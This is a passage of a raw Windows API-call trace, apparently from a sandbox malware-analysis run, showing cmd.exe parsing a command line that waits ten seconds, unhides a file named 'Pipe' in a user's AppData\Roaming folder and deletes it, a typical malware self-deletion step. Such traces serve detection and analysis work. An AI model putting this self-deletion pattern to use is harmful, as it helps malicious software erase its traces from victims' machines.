0x0 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x0, lpData=0x2ce9f8*=0x0, lpcbData=0x2ce9f0*=0x1000) returned 0x2 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x1, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x0, lpData=0x2ce9f8*=0x1, lpcbData=0x2ce9f0*=0x1000) returned 0x2 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x0, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x40, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x40, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x0, lpData=0x2ce9f8*=0x40, lpcbData=0x2ce9f0*=0x1000) returned 0x2 [0084.001] RegCloseKey (hKey=0x68) returned 0x0 [0084.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9ec | out: phkResult=0x2ce9ec*=0x68) returned 0x0 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x0, lpData=0x2ce9f8*=0x40, lpcbData=0x2ce9f0*=0x1000) returned 0x2 [0084.001] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x1, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.002] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x0, lpData=0x2ce9f8*=0x1, lpcbData=0x2ce9f0*=0x1000) returned 0x2 [0084.002] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x0, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.002] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x9, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.002] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x4, lpData=0x2ce9f8*=0x9, lpcbData=0x2ce9f0*=0x4) returned 0x0 [0084.002] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9f4, lpData=0x2ce9f8, lpcbData=0x2ce9f0*=0x1000 | out: lpType=0x2ce9f4*=0x0, lpData=0x2ce9f8*=0x9, lpcbData=0x2ce9f0*=0x1000) returned 0x2 [0084.002] RegCloseKey (hKey=0x68) returned 0x0 [0084.002] time (in: timer=0x0 | out: timer=0x0) returned 0x5ef459d8 [0084.002] srand (_Seed=0x5ef459d8) [0084.002] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\"" [0084.002] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\"" [0084.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.003] GetProcessHeap () returned 0x610000 [0084.003] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x622168 [0084.003] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x622170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0084.003] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0084.003] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.003] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0084.003] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0084.003] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0084.003] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0084.003] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0084.003] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0084.003] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0084.003] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0084.003] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0084.003] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0084.004] GetProcessHeap () returned 0x610000 [0084.004] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622c40 | out: hHeap=0x610000) returned 1 [0084.004] GetEnvironmentStringsW () returned 0x622380* [0084.004] GetProcessHeap () returned 0x610000 [0084.004] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xae2) returned 0x624ce0 [0084.004] FreeEnvironmentStringsW (penv=0x622380) returned 1 [0084.004] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.004] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0084.004] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0084.004] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0084.004] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0084.004] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0084.004] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0084.004] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0084.004] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0084.004] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0084.004] GetProcessHeap () returned 0x610000 [0084.005] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x6257d0 [0084.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7b8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.005] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7b8, lpFilePart=0x2cf7b4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf7b4*="Desktop") returned 0x25 [0084.005] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0084.005] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf534 | out: lpFindFileData=0x2cf534*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x621fe8 [0084.005] FindClose (in: hFindFile=0x621fe8 | out: hFindFile=0x621fe8) returned 1 [0084.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf534 | out: lpFindFileData=0x2cf534*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcfe629a0, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xcfe629a0, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x621fe8 [0084.005] FindClose (in: hFindFile=0x621fe8 | out: hFindFile=0x621fe8) returned 1 [0084.006] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0084.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf534 | out: lpFindFileData=0x2cf534*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd637660, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xcd637660, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x621fe8 [0084.006] FindClose (in: hFindFile=0x621fe8 | out: hFindFile=0x621fe8) returned 1 [0084.006] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0084.006] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0084.006] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0084.006] GetProcessHeap () returned 0x610000 [0084.006] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624ce0 | out: hHeap=0x610000) returned 1 [0084.006] GetEnvironmentStringsW () returned 0x6241f0* [0084.006] GetProcessHeap () returned 0x610000 [0084.006] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x625830 [0084.007] FreeEnvironmentStringsW (penv=0x6241f0) returned 1 [0084.007] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.007] GetProcessHeap () returned 0x610000 [0084.007] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6257d0 | out: hHeap=0x610000) returned 1 [0084.007] GetProcessHeap () returned 0x610000 [0084.007] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x626370 [0084.007] GetProcessHeap () returned 0x610000 [0084.007] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x128) returned 0x610ff0 [0084.007] GetProcessHeap () returned 0x610000 [0084.007] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626370 | out: hHeap=0x610000) returned 1 [0084.007] GetConsoleOutputCP () returned 0x1b5 [0084.008] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0084.008] GetUserDefaultLCID () returned 0x409 [0084.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a2f4950, cchData=8 | out: lpLCData=":") returned 2 [0084.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8f8, cchData=128 | out: lpLCData="0") returned 2 [0084.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8f8, cchData=128 | out: lpLCData="0") returned 2 [0084.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8f8, cchData=128 | out: lpLCData="1") returned 2 [0084.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a2f4940, cchData=8 | out: lpLCData="/") returned 2 [0084.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a2f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a2f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a2f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a2f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a2f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a2f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a2f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a2f4930, cchData=8 | out: lpLCData=".") returned 2 [0084.010] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a2f4920, cchData=8 | out: lpLCData=",") returned 2 [0084.010] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0084.012] GetProcessHeap () returned 0x610000 [0084.012] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x622ec0 [0084.012] GetConsoleTitleW (in: lpConsoleTitle=0x622ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.012] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0084.012] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0084.012] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0084.013] GetProcessHeap () returned 0x610000 [0084.013] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626370 [0084.013] GetProcessHeap () returned 0x610000 [0084.013] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626370 | out: hHeap=0x610000) returned 1 [0084.013] _wcsicmp (_String1="choice", _String2=")") returned 58 [0084.014] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0084.014] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0084.014] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0084.014] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0084.014] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0084.014] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0084.014] GetProcessHeap () returned 0x610000 [0084.014] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x611120 [0084.014] GetProcessHeap () returned 0x610000 [0084.014] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x16) returned 0x611180 [0084.014] GetProcessHeap () returned 0x610000 [0084.014] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x22) returned 0x6111a0 [0084.015] GetProcessHeap () returned 0x610000 [0084.015] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x6111d0 [0084.016] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0084.016] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0084.016] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0084.016] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0084.016] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0084.016] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0084.016] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0084.016] GetProcessHeap () returned 0x610000 [0084.016] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x611230 [0084.016] GetProcessHeap () returned 0x610000 [0084.016] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x16) returned 0x611290 [0084.018] GetProcessHeap () returned 0x610000 [0084.018] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x7c) returned 0x6230d8 [0084.019] GetProcessHeap () returned 0x610000 [0084.019] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623160 [0084.019] _wcsicmp (_String1="del", _String2=")") returned 59 [0084.019] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0084.019] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0084.019] _wcsicmp (_String1="IF", _String2="del") returned 5 [0084.019] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0084.019] _wcsicmp (_String1="REM", _String2="del") returned 14 [0084.019] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0084.019] GetProcessHeap () returned 0x610000 [0084.019] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x6231c0 [0084.019] GetProcessHeap () returned 0x610000 [0084.019] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x620020 [0084.021] GetProcessHeap () returned 0x610000 [0084.021] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x74) returned 0x626388 [0084.022] GetConsoleTitleW (in: lpConsoleTitle=0x2cf58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.023] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0084.023] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0084.023] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0084.023] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0084.023] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0084.023] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0084.023] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0084.023] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0084.023] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0084.023] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0084.023] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0084.023] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0084.023] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0084.023] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0084.023] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0084.023] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0084.023] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0084.023] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0084.023] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0084.023] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0084.023] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0084.024] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0084.024] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0084.024] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0084.024] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0084.024] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0084.024] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0084.025] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0084.025] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0084.025] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0084.025] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0084.025] _wcsicmp (_String1="choice", _String2="START") returned -16 [0084.025] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0084.025] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0084.025] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0084.025] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0084.025] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0084.025] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0084.025] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0084.025] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0084.025] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0084.025] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0084.025] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0084.025] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0084.025] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0084.025] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0084.025] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0084.025] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0084.025] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0084.025] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0084.025] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0084.025] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0084.025] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0084.025] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0084.026] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0084.026] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0084.026] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0084.026] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0084.026] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0084.026] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0084.026] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0084.026] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0084.026] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0084.026] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0084.026] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0084.026] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0084.026] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0084.026] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0084.026] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0084.026] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0084.026] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0084.026] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0084.026] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0084.026] _wcsicmp (_String1="choice", _String2="START") returned -16 [0084.026] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0084.026] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0084.026] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0084.026] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0084.026] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0084.026] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0084.026] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0084.026] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0084.027] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0084.027] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0084.027] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0084.027] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0084.027] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0084.027] GetProcessHeap () returned 0x610000 [0084.027] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x623220 [0084.027] GetProcessHeap () returned 0x610000 [0084.027] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x623438 [0084.027] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0084.027] GetProcessHeap () returned 0x610000 [0084.028] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x6241f0 [0084.028] SetErrorMode (uMode=0x0) returned 0x0 [0084.028] SetErrorMode (uMode=0x1) returned 0x0 [0084.028] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6241f8, lpFilePart=0x2cf0ac | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf0ac*="Desktop") returned 0x25 [0084.028] SetErrorMode (uMode=0x0) returned 0x1 [0084.028] GetProcessHeap () returned 0x610000 [0084.028] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6241f0, Size=0x62) returned 0x6241f0 [0084.028] GetProcessHeap () returned 0x610000 [0084.028] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6241f0) returned 0x62 [0084.028] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0084.028] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0084.028] GetProcessHeap () returned 0x610000 [0084.028] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x120) returned 0x623470 [0084.028] GetProcessHeap () returned 0x610000 [0084.028] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x238) returned 0x624260 [0084.037] GetProcessHeap () returned 0x610000 [0084.037] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x624260, Size=0x122) returned 0x624260 [0084.037] GetProcessHeap () returned 0x610000 [0084.037] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x624260) returned 0x122 [0084.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.037] GetProcessHeap () returned 0x610000 [0084.037] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe0) returned 0x623598 [0084.037] GetProcessHeap () returned 0x610000 [0084.037] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x623598, Size=0x76) returned 0x623598 [0084.037] GetProcessHeap () returned 0x610000 [0084.037] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x623598) returned 0x76 [0084.038] GetDriveTypeW 